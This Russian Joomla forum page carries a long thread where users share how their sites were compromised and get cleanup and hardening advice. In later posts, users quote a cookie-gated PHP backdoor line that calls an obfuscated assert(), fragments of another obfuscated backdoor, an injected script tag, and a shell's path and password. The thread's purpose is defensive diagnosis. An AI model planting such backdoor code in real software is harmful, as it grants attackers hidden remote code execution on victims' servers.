Новости Joomla

IWS.BY VK app widget - Виджет приложения ВКонтакте для Joomla

IWS.BY VK app widget - Виджет приложения ВКонтакте для Joomla

👩‍💻 IWS.BY VK app widget - Виджет приложения ВКонтакте для Joomla.Модуль «Виджет приложения ВКонтакте» для Joomla поможет добавить на сайт виджет с карточкой приложения или игры из социальной сети ВКонтакте.У вас возникла потребность отобразить информацию о ваших приложениях или играх на сайте с кнопкой перехода в социальную сеть, то этот модуль для Вас. Вам не придется хранить информацию о приложении у себя на сайте, все данные получаются через публичное API социальной сети ВКонтакте. Хранение информации на стороне ВКонтакте позволит Вам не нагружать базу данных сайта.В модуле имеется всего несколько опций и полей, которые максимально упрощают публикацию виджета. Первая опция позволяет подключить публичное API социальной сети ВКонтакте, необходимое для работы виджетов. Следующее поле потребует ввести идентификатор приложения или игры, присвоенный в социальной сети ВКонтакте. Следующая опция позволит выбрать вид отображаемой информации в виджете.Модуль имеет 3 варианта отображения:- карточка- участники- кнопкаПоддерживаемые версии Joomla: Joomla 3, Joomla 4, Joomla 5.Страница расширенияJoomla Extensions Directory#joomla #расширения #vk

SW JProjects v.2.5.0 - компонент каталога цифровых проектов на Joomla

SW JProjects v.2.5.0 - компонент каталога цифровых проектов на Joomla

👩‍💻 SW JProjects v.2.5.0 - компонент каталога цифровых проектов на Joomla.Компонент - менеджер цифровых проектов для Joomla! CMS. Компонент обеспечивает создание каталога цифровых проектов и предоставляет возможность скачивания, в том числе с использованием лицензионных ключей.👩‍💻 v.2.5.0. Что нового?Схемы структур данных для серверов обновлений. Теперь с SW JProjects вы может создавать сервер обновлений не только для расширений Joomla, но и свои собственные. Например, вам нужно, чтобы структура данных сервера обновлений была другая и формат должен быть, например, не XML, а JSON. Формирование структуры данных для сервера обновлений расширений Joomla вынесено в отдельный плагин. Вы можете создать свой собственный плагин и реализовать в нём нужную вам структуру данных, добавив или наоборот исключив отображаемые данные. Сервер обновлений в компоненте по-прежнему отображает информацию о списке проектов и их версиях, о конкретном проекте и его changelog.Можно выбрать схему данных сервера обновлений глобально для всего компонента, выбрать другую схему данных для категории проектов, а так же выбрать схему в каждом проекте.

Разработчикам в качестве образца можно посмотреть плагин схемы данных для Joomla в составе компонента или же плагин-образец JSON-схемы на GitHub.
Группа плагинов swjprojects. Для нужд компонента создана группа плагинов swjprojects. В частности, в этой группе находится плагин структуры данных Joomla расширений для сервера обновлений.Изменение языковых констант. Изменены некоторые языковые константы в панели администратора. Если вы делали переопределение констант - переопределите их снова.👩‍💻 Joomla 6. Внесены изменения для корректной установки и работы компонента на Joomla 6. Компонент успешно протестирован на Joomla 6-beta2.Минимальная версия Joomla - 5. Подняты минимальные системные требования: Joomla 5.0.0 и PHP 8.1.
- Страница расширения👉 Плагин-образец кастомной JSON-схемы данных для сервера обновлений на GitHub.- GitHub расширения- Документация на GitHub- Joomla Extensions Directory#joomla #расширения

0 Пользователей и 1 Гость просматривают эту тему.
  • 792 Ответов
  • 288535 Просмотров
*

capricorn

  • Завсегдатай
  • 1949
  • 118 / 3
А чего так бояться заражения? Что в этом такого страшного? Если есть норм бэкап, то найти заразу легко.

Цитировать
Встречается случаи когда кеш системы не чистится, и после чистки файлов все равно нет результата
один из способов это почистить в БД таблицу #_session  не всегда помогает на 100%, видимо еще и кешируется у провайдера или на каких либо удаленных серверах

Кэшируется обычно на компе вирусня и ждет ftp соединения.

« Последнее редактирование: 24.04.2015, 10:34:37 от capricorn »
*

creative3d

  • Захожу иногда
  • 189
  • 6 / 0
Что можно сделать для такой ситуации:
Мобильный редирект, шелл вроде бы найден и дырки залатаны. Но периодически появляется:
Код: javascript
<script type="text/javascript" src="http://*.ru"></script>

в настройках jcomments (был 1 раз в customHtml модуле)
Сперва сменил пароль user и root, вскоре опять появился. Потом сменил пароль к базе данных. Вирус исчез, но может через несколько недель опять появляться, опять меняю пароль к базе данных и всё нормально.
Какие тут дыры можно залатать, и нельзя ли как-нибудь по-другому прятать файл configuration.php ? Там права 444, но может этого недостаточно...
(установлен plugin Marco's SQL Injection - LFI Interceptor)
Кто еще сталкивался с подобного рода скриптом, напишите, что вам помогло.
Спасибо. ^-^
*

Владимир999

  • Захожу иногда
  • 106
  • 1 / 0
Проверь веб директорию http://yandex.ru/promo/manul#about
*

creative3d

  • Захожу иногда
  • 189
  • 6 / 0
Ссылка вроде занимательная, но сканирование не завершилось...
PHP error - Undefined variable: filePath
Сканирование давно проходили. Думал, может что-то конкретное, связанное с БД можно узнать. Т.к. насколько я понимаю, "взламывается" последнее время только пароль от БД. Хотя я плохо понимаю всё равно...
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
После работ связанных с чисткой и обновлением, закрытием всех уязвимостей, меняются все пароли иногда даже логины если они не уникальны (типа admin), пароли все набор цифр и букв как заглавные так и прописные и все возможные знаки, длина паролей от 12-14 знаков, закрывается панель управления http авторизацией как минимум. Все довольно просто.
*

creative3d

  • Захожу иногда
  • 189
  • 6 / 0
закрывается панель управления http авторизацией как минимум.
- А разве есть панели управления без авторизации? Может я чего-то не понимаю?..
- А вот у ispmanager и phpMyAdmin - root логин так и остается root? Где-то можно/нужно изменить? (хотя у phpMyAdmin вроде не root стоит, но root вроде тоже активен...)
- Для входа в админку сайта стоит ли включать новую фичу "двух-факторная авторизация"?
- Что думаете по поводу Admin Tools Pro от Akeeba?
Спасибо.
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
- А разве есть панели управления без авторизации? Может я чего-то не понимаю?..
http://httpd.apache.org/docs/2.2/mod/mod_auth_digest.html#msie
- А вот у ispmanager и phpMyAdmin - root логин так и остается root? Где-то можно/нужно изменить? (хотя у phpMyAdmin вроде не root стоит, но root вроде тоже активен...)
root используется только для настроек сервера, для работы с сайтом для каждого сайта! создается свой пользователь для панели и базы данных и своя бд
[/quote]
- Для входа в админку сайта стоит ли включать новую фичу "двух-факторная авторизация"?
Как пожелаете.
- Что думаете по поводу Admin Tools Pro от Akeeba?
Ни чего стороннего ни когда не рекомендую, правильная настройка сервера и своевременное обновление движка и расширений, хватает на все 100%.
*

askona

  • Захожу иногда
  • 98
  • 2 / 0
Стал счастливым обладателем очередного вируса на Joomla 1.5.26. Вроде избавился от редиректа и от самого шелла, отследил в логах как заходит взломщик на сайт. Когда удалил пару файлов редиректа, увидел в корне сайта только записанный  файл trd.php, загруженный у меня на глазах. Тут же его скачал. Прикладываю txt версию этого скрипта, суда по коду, он после выполнения должен был удалиться, но не успел. Комментарии в файле написаны по русски и много там интересного. И что самое интересное - редирект через redirect.ru был на ya.ru - для чего не понятно.
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Стал счастливым обладателем очередного вируса на Joomla 1.5.26. Вроде избавился от редиректа и от самого шелла, отследил в логах как заходит взломщик на сайт. Когда удалил пару файлов редиректа, увидел в корне сайта только записанный  файл trd.php, загруженный у меня на глазах. Тут же его скачал. Прикладываю txt версию этого скрипта, суда по коду, он после выполнения должен был удалиться, но не успел. Комментарии в файле написаны по русски и много там интересного. И что самое интересное - редирект через redirect.ru был на ya.ru - для чего не понятно.
Файлик довольна токи интересный и грамотно написан, на досуге по анализирую...
*

askona

  • Захожу иногда
  • 98
  • 2 / 0
Опишу, что я делал на своем сайте:
сам шелл прописался в папке: /administrator/components/com_phocagallery/front/assets/js/shadowbox/src/skin/classic/icons/config.php, при переходе по ссылке, требует ввод пароля, пароль тоже нашел в логах: ?6xlnchp7, судя по скрипту этот файл может прописаться в любую дальнюю папку. Далее Удалил строку с preg_replace сверху файла componets/com_weblinks/router.php. Нашел лишние файлы: /componets/com_content/articled.php , /componets/com_content/category.php , /includes/inc.class.php, снес их, получил ошибку в файле /includes/application.php ,в нем сверху удалил инклуд, и сайт заработал. Все это прописано в выложенном сверху скрипте. Может кому то поможет. Скорее всего, это было сделано для того, чтобы сайт выпал из индекса, смысл делать редирект на ya.ru. Как то так.
« Последнее редактирование: 02.06.2015, 16:29:25 от askona »
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Файлик довольна токи интересный и грамотно написан, на досуге по анализирую...
Обычный загрузочный/управляющий.

Вот всегда мысль одна есть и будет
- их бы энергию да в мирных целях
*

ShniderHost

  • Осваиваюсь на форуме
  • 24
  • 0 / 3
Лечим Joomla от вирусов :) https://joomla.shneider-host.ru/blog/optimizatsiia-i-bezopasnost-joomla/kak-ochistit-sait-joomla-ot-virusov

инструкция для новичков :) если вылечить не удалось самостоятельно, но рекомендую все же обратится к профессионалам, по поводу
flyingspook - слышал положительные отзывы, и берет он не дорого.
*

creative3d

  • Захожу иногда
  • 189
  • 6 / 0
Некоторые мои вопросы были проигнорированы, нашел ответы, их нужно добавить в тему!
-----------------------------------------------------------------------
configuration.php прячем за пределы сайта в любую папку:
administrator/includes/defines.php - здесь меняем путь,
/includes/defines.php - здесь меняем путь на
define('JPATH_CONFIGURATION', JPATH_ROOT . '/../folder');
Также прячем папки tmp и logs (путь в админке сайта)
*

dormidont

  • Осваиваюсь на форуме
  • 19
  • 0 / 0
хостинговый антивирь нашел очердную каку
httpdocs/plugins/editors/tinymce/jscripts/tiny_mce/plugins/example/wso2.php Sanesecurity.Malware.21995.Backdoor.UNOFFICIAL
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
хостинговый антивирь нашел очердную каку
httpdocs/plugins/editors/tinymce/jscripts/tiny_mce/plugins/example/wso2.php Sanesecurity.Malware.21995.Backdoor.UNOFFICIAL
Так это уже не атака, а shell залили
*

laralexy1

  • Новичок
  • 1
  • 0 / 0
Ребят, помогите убрать shell, ужасные ссылки левые на сайте  http://www.sosnovobor.ru/sanatornoe-lechenie.html
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Ребят, помогите убрать shell, ужасные ссылки левые на сайте  http://www.sosnovobor.ru/sanatornoe-lechenie.html

Пишите мне в аську, тема с отзывами https://forum.antichat.ru/threads/375030/
*

galyabu

  • Новичок
  • 2
  • 0 / 0
Здравствуйте! Похоже ли это на шелл? обнаружила его на всех своих сайтах на хосте (12 шт, из них Joomla - 11 шт). php файл был размещен даже на сайте html5 (собственно, он мне и помог обнаружить этот левый php). удалила его со всех сайтов и прекратилось еженедельное заражение js файлов мобильным редиректом.
*

rmnk

  • Осваиваюсь на форуме
  • 36
  • 1 / 1
Здравствуйте! Обнаружил, что в папке с шаблоном несколько дней назад появился файл .php со странным названием

файл содержит такой код (несколько цифр изменил на всякий случай)
Спойлер
[свернуть]

что это такое, кто-нибудь может подсказать?
« Последнее редактирование: 27.11.2015, 12:07:44 от rmnk »
*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
Ну явно не код скрипта Joomla . Нет проверки на вход через index.php Joomla. Загрузка кода из массива POST
Код
// no direct access

defined( '_JEXEC' ) or die( 'Restricted index access' );
Поставь временно JHackGuard и запрети выполнение POST . И ищи шелл.
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
что это такое, кто-нибудь может подсказать?
Вас уже взломали, чистите сайт и обновляйте все что требуется.
*

rmnk

  • Осваиваюсь на форуме
  • 36
  • 1 / 1
Вас уже взломали, чистите сайт и обновляйте все что требуется.

А есть смысл восстанавливать бекап недельной давности, например (файл этот залит позже) и расслабиться или все равно взломают опять, раз уже какая-то есть "дыра"
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
А есть смысл восстанавливать бекап недельной давности, например (файл этот залит позже) и расслабиться или все равно взломают опять, раз уже какая-то есть "дыра"
А как вы можете убедиться когда был файл залит?, можете сделать по старому бекапу сумму md5hash файлов старого движка и щас взломаного, если вы уверены что старый конечно чистый, выявить дату файлов которые попадают в разницу и проанализировать по ним логи с целью выявления ошибки и пофиксить, если просто откатывать бекап взлом рано или поздно снова повторится, также обязательны профилактические меры
*

rmnk

  • Осваиваюсь на форуме
  • 36
  • 1 / 1
Спасибо за ответы. Будем лечить
*

creative3d

  • Захожу иногда
  • 189
  • 6 / 0
Здравствуйте. Новогодний подарок тут получил, вроде он не успел сработать, но не знаю... Скажите, пожалуйста, что это такое, как, почему и зачем? !
1) В конец файла /includes/defines.php добавилась строчка:
Код: php
if(strpos(implode($_SERVER),"O:")){exit;}
2) В конец файла /libraries/joomla/access/rule.php добавилась строчка:
Код: php
if((md5(@$_COOKIE[ssid])=="0d39ee6941ac9d79b6fe314bbaca617e")){error_reporting(0);@array_map("a\x73"."sert",(array) $_SERVER[HTTP_X]);}
3) Появился новый файл: /libraries/simplepie/simplepie.lib.php (см. вложение)
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Здравствуйте. Новогодний подарок тут получил, вроде он не успел сработать, но не знаю... Скажите, пожалуйста, что это такое, как, почему и зачем? !
1) В конец файла /includes/defines.php добавилась строчка:
Код: php
if(strpos(implode($_SERVER),"O:")){exit;}
2) В конец файла /libraries/joomla/access/rule.php добавилась строчка:
Код: php
if((md5(@$_COOKIE[ssid])=="0d39ee6941ac9d79b6fe314bbaca617e")){error_reporting(0);@array_map("a\x73"."sert",(array) $_SERVER[HTTP_X]);}
3) Появился новый файл: /libraries/simplepie/simplepie.lib.php (см. вложение)
Первая строчка это фикс последней баги через сессию, второй это бегдор, вообщем чел ломанул и закрепился чтоб кроме него больше ни кто, не лез)))

Вложенный файл тоже является запутанным бегдором:
Цитировать
36. $id = $_SERVER['HTTP_SESSION'];
...
114.  */ $a='as';
...
 */ $b='sert'; $a=$a.$b;
...
161. */ $start = strpos($sess,'0d39ee');
...
202.  */ if($start===0){@${a}($id);}
« Последнее редактирование: 16.12.2015, 11:56:49 от winstrool »
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Скажите, пожалуйста, что это такое, как, почему и зачем? !
Возвращается 2011г.
Все взломы перешли давно в стадию.
Делают взломы для индивидуального использования, т.е. дальнейшей продажи или слива трафика.
Набирают сервера для чего то массового.
Ну и как все "угоны" сначала в отстойник, и потом использование. (многие и знать не будут что они уже давным давно взломаны)
*

creative3d

  • Захожу иногда
  • 189
  • 6 / 0
Возвращается 2011г.
Я имел в виду конкретно мой случай, если я правильно понял...

Спасибо за ответ, winstrool.
это фикс последней баги через сессию
Что за последняя бага? В 3.4.5 была? В 3.4.6 есть? И зачем он ее пофиксил? )
Т.е. он получается, что доступ ко всем файлам на сайте получил? А может он перейти в папки, те, что выше папки с сайтом?
Если взломали, то у чела-взломщика обязательно будут украденные пароли, или это как-то можно так сделать, что без взлома паролей, получаешь доступ?
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Я имел в виду конкретно мой случай, если я правильно понял...

Спасибо за ответ, winstrool.Что за последняя бага? В 3.4.5 была? В 3.4.6 есть? И зачем он ее пофиксил? )
Т.е. он получается, что доступ ко всем файлам на сайте получил? А может он перейти в папки, те, что выше папки с сайтом?
Если взломали, то у чела-взломщика обязательно будут украденные пароли, или это как-то можно так сделать, что без взлома паролей, получаешь доступ?
Если у вас хостинг и нет разграничений по папкам пользователям то да имеет доступ ко всему.
Профиксили баг 3.4.5 и закрыли возможность другим взломать.
Имеют доступ сейчас ко всему и файлам и к бд

В 3.4.6 нету она закрывает все что было в 3.4.5
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Редирект на спам ссылки. Как лчить?

Автор Евгений1980

Ответов: 2
Просмотров: 2150
Последний ответ 14.02.2024, 13:15:59
от wishlight
Скрипт для поиска вирусов и вредоносных скриптов на сайте "AI-Bolit"

Автор revisium

Ответов: 110
Просмотров: 69744
Последний ответ 30.08.2023, 12:53:33
от SeBun
Вирус редирект или взлом с редиректом Joomla 3.10

Автор Wany205

Ответов: 1
Просмотров: 3066
Последний ответ 25.05.2023, 08:49:57
от Театрал
Re: Кажется вирус на сайте

Автор motokraft

Ответов: 24
Просмотров: 4706
Последний ответ 04.05.2022, 14:04:17
от ProtectYourSite
Хостинг пишет, что найден вирус в /media/com_media/js/media-manager-es5.js

Автор AlexP750

Ответов: 6
Просмотров: 3332
Последний ответ 22.02.2022, 11:38:15
от AlexP750